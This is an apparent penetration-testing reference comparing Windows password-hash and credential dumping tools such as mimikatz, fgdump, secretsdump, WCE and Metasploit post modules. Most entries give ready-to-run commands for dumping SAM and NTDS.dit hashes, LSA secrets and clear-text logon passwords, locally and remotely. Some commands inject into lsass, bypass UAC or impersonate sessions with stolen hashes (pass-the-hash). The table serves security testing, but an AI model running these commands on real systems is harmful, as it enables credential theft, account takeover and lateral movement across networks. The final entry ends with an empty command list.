Password hashes dump tools
Each entry below lists, for one tool: the interface (Command line, GUI), the scope (Local, Remote), what it can dump (SAM, NTDS.dit, Password history, LSA secrets, Credential manager, Protected storage, Autologin, Logon sessions, Clear-text logon sessions, Session tokens, Cached domain logon information, Wireless, VNC, Certificates and keys), the platforms supported (32-bit, 64-bit, Windows XP/2003, Windows Vista/2008/7, RDP session isolation), then Notes and Commands. "See notes" points to the Notes field of the same entry.

Cain & Abel
  Command line: No | GUI: Yes | Local: Yes | Remote: Yes. See notes
  SAM: Yes (in-memory and from reg files) | NTDS.dit: Yes (in-memory) | Password history: Yes | LSA secrets: Yes (in-memory and from reg files)
  Credential manager: Yes locally, No remotely | Protected storage: Yes locally, No remotely | Autologin: Yes (via LSA secrets)
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: Yes (in-memory and from reg files)
  Wireless: Yes | VNC: Yes | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: Yes
  Notes: To dump SAM and LSA secrets remotely, use Cain to connect to the target machine as an administrative user, right-click on Services, then "Install Abel", refresh your Network tab and expand the target entry, then expand the Abel sub-entry and either dump SAM and password history from the "Hashes" entry or LSA secrets from the entry below.
  Commands: -

pwdump2
  Command line: Yes | GUI: No | Local: Yes | Remote: No
  SAM: Yes (in-memory) | NTDS.dit: Yes (in-memory) | Password history: No | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: No. See notes | Windows XP/2003: Yes | Windows Vista/2008/7: No | RDP session isolation: Yes. See notes
  Notes: On 64-bit architecture it fails and displays "CreateRemoteThread failed: 5". On remote logon sessions via RDP it fails and displays "CreateRemoteThread failed: 8"; run as SYSTEM to avoid this.
  Commands:
    C:\>pwdump2.exe [lsass.exe PID]

pwdump6
  Command line: Yes. See notes | GUI: No | Local: Yes | Remote: Yes
  SAM: Yes (in-memory) | NTDS.dit: Yes (in-memory) | Password history: Yes | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: Yes
  Notes: Make sure you launch it from C:\ and not from a network shared folder.
  Commands:
    C:\>PwDump.exe -o pwdump6.log 127.0.0.1
    C:\>PwDump.exe -x -o pwdump6.log 127.0.0.1 # 64-bit
    C:\>PwDump.exe -o pwdump6.log -u Administrator -p <password> -s ADMIN$ 192.168.0.1 # remote, one IP

pwdump7
  Command line: Yes | GUI: No | Local: Yes | Remote: No
  SAM: Yes (from registry files). See notes | NTDS.dit: No | Password history: No | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes. See notes | RDP session isolation: Yes
  Notes: On domain controllers use in-memory tools or extract from the ntds.dit file, as the SAM contains no domain users, just the "restore mode" administrator password of the DC.
  Commands:
    C:\>PwDump7.exe # online SAM and SYSTEM registry files
    C:\>PwDump7.exe -s <samfile> <systemfile> # offline SAM and SYSTEM registry files

Quarks PwDump
  Command line: Yes | GUI: No | Local: Yes | Remote: No
  SAM: Yes (from registry files). See notes | NTDS.dit: Yes (from NTDS.dit) | Password history: Yes | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: Yes (from registry files)
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: Yes
  Notes: -
  Commands:
    C:\>quarks-pwdump.exe -dhl -hist -o hashes.txt # dump local SAM
    C:\>quarks-pwdump.exe -dhdc -o cached.txt # dump cached domain logon information
    C:\>quarks-pwdump.exe -dhd -hist -nt C:\Windows\NTDS\ntds.dit -o hashes.txt # dump domain password hashes

PowerDump
  Command line: Yes | GUI: No | Local: Yes | Remote: No
  SAM: Yes (from registry files). See notes | NTDS.dit: No | Password history: No | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes. See notes | RDP session isolation: Yes
  Notes: On domain controllers use in-memory tools or extract from the ntds.dit file, as the SAM contains no domain users, just the "restore mode" administrator password of the DC.
  Commands:
    Run as SYSTEM:
    C:\>powershell Set-ExecutionPolicy Unrestricted
    C:\>powershell C:\path\of\powerdump.ps1

fgdump
  Command line: Yes | GUI: No | Local: Yes | Remote: Yes
  SAM: Yes (in-memory) | NTDS.dit: Yes (?) | Password history: Yes | LSA secrets: No
  Credential manager: No | Protected storage: Unreliable. See notes | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: Yes (in memory). See notes
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: Yes
  Notes: To dump the cached domain creds it embeds cachedump.exe, and on 64-bit architecture it fails and displays "ERROR Unable to LoadLibrary lsasrv.dll (code 126)". The dumping of protected storage fails and displays "fgexec CallNamedPipe failed with error 2" regardless of the architecture.
  Commands:
    C:\>fgdump.exe -s -r -v -v -k -l fgdump.log -T 3 -O 32
    C:\>fgdump.exe -s -r -v -v -k -l fgdump.log -T 3 -O 64 # 64-bit
    C:\>fgdump.exe -s -r -v -v -k -l fgdump.log -T 3 -O 32 -h 192.168.0.1 -u Administrator -p <password> # remote, one IP
    C:\>fgdump.exe -s -r -v -v -k -l fgdump.log -T 3 -O 32 -f ips.txt -u Administrator -p <password> # remote, IP list
    C:\>fgdump.exe -s -r -v -v -k -l fgdump.log -T 3 -O 32 -H ips_creds.txt # remote, IP and creds list

PWDumpX
  Command line: Yes | GUI: No | Local: Yes | Remote: Yes
  SAM: Yes (in-memory) | NTDS.dit: Yes (in-memory) | Password history: Yes | LSA secrets: Yes (in-memory)
  Credential manager: No | Protected storage: No | Autologin: Yes (via LSA secrets)
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: Yes (in-memory)
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: No. See notes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes (?) | RDP session isolation: Yes
  Notes: On 64-bit architecture it fails and displays "ERROR! Cannot start PWDumpX service on host".
  Commands:
    C:\>PWDumpX.exe -clph 127.0.0.1 + + # use current logon session credentials
    C:\>PWDumpX.exe -clph 127.0.0.1 Administrator <password>
    C:\>PWDumpX.exe -clph ips.txt + + # remote, IP list

gsecdump
  Command line: Yes | GUI: No | Local: Yes | Remote: No
  SAM: Yes (in-memory). See notes | NTDS.dit: Yes (in-memory) | Password history: No | LSA secrets: Yes (in-memory)
  Credential manager: No | Protected storage: No | Autologin: Yes (via LSA secrets)
  Logon sessions: Yes (dump). See notes | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: Yes | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes. See notes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: Yes. See notes
  Notes: gsecdump is excellent at dumping LSA secrets regardless of the Windows version and architecture. Since version 2.0b5 it also reliably dumps SAM/AD hashes as well as logon sessions regardless of the Windows version and architecture. On remote logon sessions via RDP it fails and displays "error [6] in GetExitCodeThread: The handle is invalid" or "error [8] in CreateRemoteThread: Not enough storage is available to process this command"; run as SYSTEM to avoid this.
  Commands:
    C:\>gsecdump.exe -a

secretsdump
  Command line: Yes | GUI: No | Local: Yes | Remote: Yes
  SAM: Yes (from registry files) | NTDS.dit: Yes (from NTDS.dit) | Password history: Yes | LSA secrets: Yes (from registry files)
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: Yes (from registry files)
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: -
  Notes: -
  Commands:
    $ secretsdump.py -debug -outputfile target_ip DOMAIN/Administrator:password@192.168.0.1
    $ secretsdump.py -debug -outputfile target_ip -hashes LMhash:NThash DOMAIN/Administrator@192.168.0.1
    $ secretsdump.py -debug -outputfile target_ip -system SYSTEM -security SECURITY -sam SAM -ntds ntds.dit LOCAL

carrot
  Command line: Yes. See notes | GUI: No | Local: Yes | Remote: No
  SAM: Yes (from registry files). See notes | NTDS.dit: Yes (?) | Password history: No | LSA secrets: No
  Credential manager: Unreliable. See notes | Protected storage: Yes | Autologin: Yes
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: Yes | VNC: Yes | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: Yes
  Notes: It is a bundle of the other tools, including the NirSoft ones (netpass, WirelessKeyView, etc.). Prefer netpass to dump the credential manager. To dump SAM hashes it uses pwdump7.
  Commands:
    C:\>carrot.exe /nouac # as SYSTEM, disable UAC
    C:\>carrot.exe /32 /pwdump /np /ps /wlan /vnc # as user or Administrator
    C:\>carrot.exe /64 /pwdump /np /ps /wlan /vnc # as user or Administrator, 64-bit

Metasploit smart_hashdump (post module)
  Command line: Yes | GUI: No | Local: Yes | Remote: Yes
  SAM: Yes (in-memory and from reg files) | NTDS.dit: Yes (in-memory) | Password history: No | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: -
  Notes: When run on domain controllers, it uses the in-memory technique to dump domain users' credentials. Conversely, when the target is a workstation, it dumps the hashes from the SAM file instead.
  Commands:
    run post/windows/gather/smart_hashdump GETSYSTEM=true

Metasploit hashdump (post module)
  Command line: Yes | GUI: No | Local: Yes | Remote: Yes
  SAM: Yes (from registry files). See notes | NTDS.dit: No | Password history: No | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: -
  Notes: On domain controllers, prefer the Metasploit smart_hashdump post module because the SAM file does not contain domain users' information.
  Commands:
    run post/windows/gather/hashdump

Metasploit hashdump (script)
  Command line: Yes | GUI: No | Local: Yes | Remote: Yes
  SAM: Yes (from registry files). See notes | NTDS.dit: No | Password history: No | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: -
  Notes: On domain controllers, prefer the Metasploit smart_hashdump post module because the SAM file does not contain domain users' information.
  Commands:
    run hashdump

Metasploit hashdump (command)
  Command line: Yes | GUI: No | Local: Yes | Remote: Yes
  SAM: Yes (in-memory). See notes | NTDS.dit: Yes (in-memory) | Password history: No | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Unreliable. See notes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: -
  Notes: Prefer to run as SYSTEM. On 64-bit architecture, running as SYSTEM within a shell with UAC bypassed, it fails and displays "priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect".
  Commands:
    run post/windows/escalate/bypassuac
    Background session <X>? [y/N] y
    msf exploit(handler) > sessions -l
    msf exploit(handler) > sessions -i <X>+1 # these steps are recommended against Windows Vista and Windows 7 to dump SAM hashes from memory
    hashdump

mimikatz
  Command line: Yes | GUI: No | Local: Yes | Remote: No
  SAM: Yes (in-memory and from reg files) | NTDS.dit: Yes (in-memory) | Password history: Yes | LSA secrets: Yes (in-memory)
  Credential manager: Unreliable. See notes | Protected storage: No | Autologin: Yes (via LSA secrets)
  Logon sessions: Yes (dump and impersonate) | Clear-text logon sessions: Yes. See notes | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: Yes (exportable and non-exportable)
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: Yes
  Notes: For details on the @getLogonPasswords command refer to:
    http://blog.gentilkiwi.com/securite/pass-the-pass
    http://blog.gentilkiwi.com/securite/re-pass-the-pass
  Commands:
    Run as any user:
    mimikatz # samdump::hashes <systemfile> <samfile> # dump SAM hashes from registry file

    Run as SYSTEM (psexec.exe -s cmd.exe) or alternatively assign yourself SeDebugPrivilege with "privilege::debug":
    mimikatz # inject::process lsass.exe sekurlsa.dll # required to dump hashes from memory and other operations
    mimikatz # @getLocalAccounts # dump SAM hashes from memory
    mimikatz # @getSecrets # dump LSA secrets
    mimikatz # @getLogonSessions # dump logon sessions
    mimikatz # @getLogonPasswords # dump clear-text passwords for all sessions (console, RDP, services)
    mimikatz # crypto::patchcng

    Run as user or Administrator:
    mimikatz # divers::secrets # dump a subset of credential manager ('LegacyGeneric' entries only)
    mimikatz # crypto::patchcapi
    mimikatz # crypto::exportCertificates # dump user's DER and PFX certificates
    mimikatz # crypto::exportKeys # dump user's PVK keys

pwhist
  Command line: Yes | GUI: No | Local: Yes | Remote: No
  SAM: Yes (in-memory and from reg files) | NTDS.dit: Yes (in-memory) | Password history: Yes | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: Yes
  Notes: -
  Commands:
    Run as SYSTEM (psexec.exe -s cmd.exe):
    C:\>pwhist.exe # in-memory technique
    C:\>pwhist.exe -s <systemfile> <samfile> # offline SAM and SYSTEM registry files

bkhive / samdump2
  Command line: Yes | GUI: No | Local: Yes | Remote: No
  SAM: Yes (from registry files) | NTDS.dit: No | Password history: No | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: -
  Notes: Dump SAM hashes with physical access to the system.
  Commands:
    # mkdir -p /mnt/sda1
    # mount /dev/sda1 /mnt/sda1
    # bkhive /mnt/sda1/Windows/System32/config/SYSTEM /tmp/saved-syskey.txt
    # samdump2 /mnt/sda1/Windows/System32/config/SAM /tmp/saved-syskey.txt > /tmp/hashes.txt

creddump by moyix
  Command line: Yes | GUI: No | Local: Yes | Remote: No
  SAM: Yes (from registry files) | NTDS.dit: No | Password history: Yes | LSA secrets: Yes (from registry files). See notes
  Credential manager: No | Protected storage: No | Autologin: Yes (via LSA secrets)
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: Yes (from registry files)
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: -
  Notes: To dump LSA secrets of Windows Vista and above versions, use the enhanced version of creddump that is part of ntds_dump_hash - the tool is called lsadumpw2k8.py.
  Commands:
    $ ./pwdump.py
    usage: ./pwdump.py <system hive> <SAM hive>
    $ ./cachedump.py
    usage: ./cachedump.py <system hive> <security hive>
    $ ./lsadump.py
    usage: ./lsadump.py <system hive> <security hive>

ntds_dump_hash
  Command line: Yes | GUI: No | Local: Yes | Remote: No
  SAM: No | NTDS.dit: Yes (from NTDS.dit) | Password history: Yes | LSA secrets: Yes (from registry files)
  Credential manager: No | Protected storage: No | Autologin: Yes (via LSA secrets)
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: Yes (from registry files)
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: -
  Notes: Includes an updated version of moyix's creddump.
  Commands:
    $ wget http://csababarta.com/downloads/ntds_dump_hash.zip
    $ unzip ntds_dump_hash.zip
    $ cd libesedb
    $ ./configure && make
    $ cd esedbtools
    $ ./esedbdumphash -v -t /tmp/output <ntds.dit file>
    $ ls -1 /tmp/output.export/
    datatable
    $ cd ../../creddump/
    $ chmod +x *.py
    $ ./dsuserinfo.py /tmp/output.export/datatable
    $ ./dsdump.py <SYSTEM file> /tmp/output.export/datatable --include-locked --include-disabled > domain_hashes.txt

NTDSXtract
  Command line: Yes | GUI: No | Local: Yes | Remote: No
  SAM: No | NTDS.dit: Yes (from NTDS.dit) | Password history: Yes | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: Yes (?)
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: -
  Notes: NTDS.DIT Forensics
  Commands:
    Download and install libesedb from http://sourceforge.net/projects/libesedb/files/libesedb-alpha/:
    $ tar xvfz libesedb-alpha-20111210.tar.gz
    $ cd libesedb-20111210/
    $ ./configure
    $ make
    # make install # as root
    $ esedbexport -l /tmp/esedbexport.log -t /tmp/ntds.dit <ntds.dit>
    $ ls -1 /tmp/ntds.dit.export/
    datatable.3
    hiddentable.4
    link_table.5
    [...]
    $ wget http://csababarta.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
    $ unzip ntdsxtract_v1_0.zip
    $ cd NTDSXtract\ 1.0
    $ python dsusers.py /tmp/ntds.dit.export/datatable.3 /tmp/ntds.dit.export/link_table.5 --passwordhashes <SYSTEM file> --passwordhistory <SYSTEM file> --certificates --supplcreds <SYSTEM file> --membership > /tmp/ntds.dit.output
    $ wget https://raw.github.com/inquisb/miscellaneous/master/ntdstopwdump.py
    $ python ntdstopwdump.py /tmp/ntds.dit.output

passcape Windows Password Recovery
  Command line: No | GUI: Yes. See notes | Local: Yes | Remote: Yes
  SAM: Yes (in-memory and from reg files) | NTDS.dit: Yes (from NTDS.dit) | Password history: Yes | LSA secrets: Yes (in-memory?)
  Credential manager: No | Protected storage: No | Autologin: Yes (via LSA secrets)
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: Yes (in-memory? and from reg files)
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: Yes
  Notes: The trial version is limited in functionality; however, it can dump SAM hashes from registry files and in-memory locally. The lifetime personal license light edition costs $65.
  Commands: -

pdbedit on Unix/Linux
  Command line: Yes | GUI: No | Local: Yes | Remote: No
  SAM: No | NTDS.dit: Yes (domain users, from Samba's config) | Password history: Yes | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: No | Windows Vista/2008/7: No | RDP session isolation: -
  Notes: Dumping Samba hashes.
  Commands:
    # pdbedit -L -w -s /etc/samba/smb.conf | perl -e 'while (<>) { @smbpasswd = split(/:/, $_); print $smbpasswd[0] . ":" . $smbpasswd[1] . ":" . (($smbpasswd[2] eq "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") ? "NO PASSWORD*********************" : $smbpasswd[2]) . ":" . (($smbpasswd[3] eq "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") ? "NO PASSWORD*********************" : $smbpasswd[3]) . ":::\n"; }'

passcape Network Password Recovery
  Command line: No | GUI: Yes. See notes | Local: Yes | Remote: No
  SAM: No | NTDS.dit: No | Password history: No | LSA secrets: No
  Credential manager: Yes | Protected storage: No | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: Yes (from registry files)
  Wireless: Yes | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: Yes
  Notes: The trial version can dump all, but displays only the first three characters of dumped passwords. The lifetime personal license costs $32.
  Commands: -

lsadump2
  Command line: Yes | GUI: No | Local: Yes | Remote: No
  SAM: No | NTDS.dit: No | Password history: No | LSA secrets: Yes (in memory)
  Credential manager: No | Protected storage: No | Autologin: Yes (via LSA secrets)
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: No. See notes | Windows XP/2003: Yes | Windows Vista/2008/7: No (?) | RDP session isolation: Yes. See notes
  Notes: On 64-bit architecture it fails and displays "CreateRemoteThread failed: 5". On remote logon sessions via RDP it fails and displays "CreateRemoteThread failed: 8"; run as SYSTEM to avoid this.
  Commands:
    C:\>lsadump2.exe

LSASecretsDump
  Command line: Yes | GUI: No | Local: Yes | Remote: No
  SAM: No | NTDS.dit: No | Password history: No | LSA secrets: Unreliable. See notes
  Credential manager: No | Protected storage: No | Autologin: Yes (via LSA secrets)
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: Yes. See notes
  Notes: It has always failed to dump all LSA secrets of services running as legitimate Windows local users, regardless of the architecture, on both Windows 7 and Windows Server 2003 SP2. On remote logon sessions via RDP it fails; run as SYSTEM to avoid this.
  Commands:
    C:\>LSASecretsDump.exe -empty
    C:\>LSASecretsDump-x64.exe -empty # 64-bit

LSASecretsView
  Command line: No | GUI: Yes | Local: Yes | Remote: No
  SAM: No | NTDS.dit: No | Password history: No | LSA secrets: Unreliable. See notes
  Credential manager: No | Protected storage: No | Autologin: Yes (via LSA secrets)
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: Yes. See notes
  Notes: As with LSASecretsDump, it has always failed to dump all LSA secrets. On remote logon sessions via RDP it fails; run as SYSTEM to avoid this.
  Commands: -

Network Password Recovery (netpass)
  Command line: Yes | GUI: Yes | Local: Yes | Remote: No
  SAM: No | NTDS.dit: No | Password history: No | LSA secrets: No
  Credential manager: Yes | Protected storage: No | Autologin: Yes (via LSA secrets)
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes. See notes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: Yes
  Notes: Make sure you run the 64-bit version of this tool on 64-bit architecture, otherwise no entries will be dumped.
  Commands:
    C:\>netpass.exe /scomma netpass.csv

Metasploit gather/credentials/enum_cred_store (post module)
  Command line: Yes | GUI: No | Local: Yes | Remote: Yes
  SAM: No | NTDS.dit: No | Password history: No | LSA secrets: No
  Credential manager: Unreliable. See notes | Protected storage: No | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: -
  Notes: Prefer netpass and Cain & Abel to this Metasploit post-exploitation module. It found all entries but dumped only 2 out of 7 of them, and the loot output file is not easily readable.
  Commands:
    run post/windows/gather/credentials/enum_cred_store

creddump by oxid.it
  Command line: Yes. See notes | GUI: No | Local: Yes | Remote: No
  SAM: No | NTDS.dit: No | Password history: No | LSA secrets: No
  Credential manager: Unreliable. See notes | Protected storage: No | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: No. See notes | Windows XP/2003: Yes | Windows Vista/2008/7: No | RDP session isolation: Yes
  Notes: Avoid this tool. It crashes the lsass.exe process and the system gets restarted automatically. Use Cain & Abel by the same author or netpass instead. On 64-bit architecture it fails and displays "CreateRemoteThread failed: 5".
  Commands:
    C:\>creddump.exe

Protected Storage PassView (pspv)
  Command line: Yes | GUI: Yes | Local: Yes | Remote: No
  SAM: No | NTDS.dit: No | Password history: No | LSA secrets: No
  Credential manager: No | Protected storage: Yes | Autologin: No
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: Yes
  Notes: -
  Commands:
    C:\>pspv.exe /stab pspv.txt

Metasploit gather/credentials/windows_autologin (post module)
  Command line: Yes | GUI: No | Local: Yes | Remote: Yes
  SAM: No | NTDS.dit: No | Password history: No | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: Yes
  Logon sessions: No | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: -
  Notes: -
  Commands:
    run post/windows/gather/credentials/windows_autologin

Windows Credentials Editor (WCE)
  Command line: Yes | GUI: No | Local: Yes | Remote: No
  SAM: No | NTDS.dit: No | Password history: No | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: Yes (dump and impersonate) | Clear-text logon sessions: Yes. See notes | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes. See notes | Windows XP/2003: Yes | Windows Vista/2008/7: Yes | RDP session isolation: Yes
  Notes: With version 1.3, WCE is also able to dump clear-text passwords for logon sessions, like mimikatz does (http://hexale.blogspot.com/2012/03/wce-v13beta-32bit-released.html). Make sure you run the 64-bit version of this tool on 64-bit architecture, otherwise it won't work.
  Commands:
    C:\>wce.exe -l -v # dump available logon sessions
    C:\>wce.exe -r3 # dump available logon sessions every 3 secs
    C:\>wce.exe -w # dump clear-text passwords for logon sessions

    C:\>wce.exe -s <user>:<domain>:<LM hash>:<NT hash> -c cmd.exe # impersonate a logon session

    C:\>wce.exe -g <password> # generate LM and NT hash of <password>

Pass-The-Hash Toolkit (PTH)
  Command line: Yes | GUI: No | Local: Yes | Remote: No
  SAM: No | NTDS.dit: No | Password history: No | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: Yes (dump and impersonate) | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: No. See notes | Windows XP/2003: Yes | Windows Vista/2008/7: No. See notes | RDP session isolation: Yes. See notes
  Notes: This tool is deprecated and does not work on 64-bit architecture or recent versions of Windows. Use WCE instead. On remote logon sessions via RDP it fails and displays "Error in InjectDllAndCallFunction"; run as SYSTEM to avoid this.
  Commands:
    C:\>whosthere-alt.exe -D # dump available logon sessions
    C:\>iam-alt.exe -h <user>:<domain>:<LM hash>:<NT hash> -r cmd.exe # impersonate a logon session

    C:\>genhash.exe <password> # generate LM and NT hash of <password>

lslsass
  Command line: Yes | GUI: No | Local: Yes | Remote: No
  SAM: No | NTDS.dit: No | Password history: No | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: Yes (dump) | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: No. See notes | Windows Vista/2008/7: Yes | RDP session isolation: Yes
  Notes: Make sure you run the 64-bit version of this tool on 64-bit architecture, otherwise no entries will be dumped. On older Windows versions use mimikatz, msvctl, WCE or PTH.
  Commands:
    C:\>lslsass.exe go

RunhAsh
  Command line: Yes | GUI: No | Local: Yes | Remote: No
  SAM: No | NTDS.dit: No | Password history: No | LSA secrets: No
  Credential manager: No | Protected storage: No | Autologin: No
  Logon sessions: Yes (impersonate) | Clear-text logon sessions: No | Session tokens: No | Cached domain logon information: No
  Wireless: No | VNC: No | Certificates and keys: No
  32-bit: Yes | 64-bit: Yes | Windows XP/2003: No. See notes | Windows Vista/2008/7: Yes | RDP session isolation: Yes
  Notes: Make sure you run the 64-bit version of this tool on 64-bit architecture, otherwise it won't work. On older Windows versions use mimikatz, msvctl, WCE or PTH.
  Commands:
